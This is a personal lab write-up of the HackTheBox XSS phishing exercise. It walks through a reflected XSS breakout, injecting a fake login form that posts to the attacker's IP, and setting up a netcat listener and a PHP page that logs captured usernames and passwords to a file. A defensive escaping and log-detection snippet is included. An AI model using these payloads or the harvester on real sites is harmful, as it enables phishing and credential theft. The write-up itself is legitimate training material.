  • aldern00b

HTB - Bug Bounty Hunter Path: CROSS-SITE SCRIPTING (XSS) - Phishing

We're going to kinda just jump into this partway through 'cause I needed an area to keep notes on stuff I was working on... so if you're having issues prior to this and are reading this for help... sorry. Pop a question in and I'll see what I can do.


For this area, we're going to be using the XSS site to get some JavaScript to pop up on the page. The usual XSS payload from their example isn't working:

http://SERVER_IP/phishing/index.php?url=<script>alert(window.origin)</script>

When we run this, the HTML output shows that our input is simply being placed as the src of an image tag. What we need to do is close the src attribute and the img tag, then concatenate our script tag after it.

<img src='<script>alert(window.origin)</script>'>

Simply adding '> before our script tag fixes that.

http://SERVER_IP/phishing/index.php?url='><script>alert(window.origin)</script>

Great! So now we need to work on injecting our login form. We'll use their example for this:

<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

We're going to put it on one line and use document.write() to modify the page with this form.

'><script>document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>

That's tasty. Let's remove the Image URL portion by using

document.getElementById().remove()

Looking at the source code, we want to get rid of that form completely by toasting the element with id urlform. Let's also comment out any leftover markup after our form (the trailing <!--) so it looks a bit more professional. The new one-liner is:

?url='><script>document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
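As an added defender-side illustration (not the lab's code or HTB's material), the Python below shows why the '> breakout above works against an unescaped single-quoted attribute, how attribute-context encoding (the equivalent of htmlspecialchars with ENT_QUOTES) neutralises it, and how the same breakout looks in a web server access log. The rendering functions are a constructed stand-in for the page's img tag, and the log lines, IPs and paths are made up for the example.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed stand-in for how /phishing/index.php appears to build its tag:
# the url parameter is dropped straight into a single-quoted src attribute,
# so a value starting with '> closes the attribute and the tag.
def render_vulnerable(url: str) -> str:
    return f"<img src='{url}'>"

# Hardened version: encode for an attribute context, including both quote
# characters (what PHP's htmlspecialchars($url, ENT_QUOTES) would do).
# The quote becomes &#x27; and the attribute can no longer be closed early.
def render_hardened(url: str) -> str:
    return f"<img src='{html.escape(url, quote=True)}'>"

# Detection: a url value that closes a quoted attribute and immediately
# opens new markup (the '>< sequence used above) is a breakout attempt.
BREAKOUT = re.compile(r"""['"]\s*>\s*<""")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def is_breakout_request(log_line: str) -> bool:
    m = REQUEST.search(log_line)
    if not m:
        return False
    query = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
    for value in query.get("url", []):
        # parse_qs already decoded once; unquote again catches double encoding.
        if BREAKOUT.search(unquote(value)):
            return True
    return False

def flagged_lines(log_lines: list[str]) -> list[str]:
    return [line for line in log_lines if is_breakout_request(line)]

# Constructed access-log lines (combined format); IPs and paths are made up.
SAMPLE_LOG = [
    '10.10.14.26 - - [01/Jan/2024:12:00:00 +0000] '
    '"GET /phishing/index.php?url=http://example.com/logo.png HTTP/1.1" 200 512',
    '10.10.14.26 - - [01/Jan/2024:12:00:05 +0000] '
    '"GET /phishing/index.php?url=%27%3E%3Cscript%3Ealert(window.origin)%3C/script%3E HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    payload = "'><script>alert(window.origin)</script>"
    print(render_vulnerable(payload))   # attribute closed, script tag live
    print(render_hardened(payload))     # quote and angle brackets encoded
    print(len(flagged_lines(SAMPLE_LOG)), "suspicious request(s)")
```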

OK so now we have a login form to use. We're going to steal some credentials now!!! We're going to start a netcat listener, but if you're using the HTB system you may run into issues with the port already being in use. You'll need to specify which IP to bind the listener to. You can do that like this, then use the port it reports in your injection:

nc -lvn 10.10.14.26

What we need to do after it's tested is set up a forwarding page so it looks like it was just a failed login. We're going to create a quick PHP page to do this. We're also going to stop using netcat and instead create a PHP listener for the connection. Here's the PHP page, called index.php, that we'll create on our VM in /tmp/tmpserver; SERVER_IP is the IP from the exercise.

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

Here's how to set it up:

mkdir /tmp/tmpserver
cd /tmp/tmpserver
vi index.php  # at this step we wrote our index.php file
sudo php -S 10.10.14.24:31337  # or whatever port you're listening on

OK so now it's up to us to do this for real and capture a login for the next page, /login.php. We're going to give our newly created URL to the phishing/send.php page and capture those logins. Basically re-do everything we just did, copy and paste it into the field, and it will capture the info you need to log in to that /login.php page.
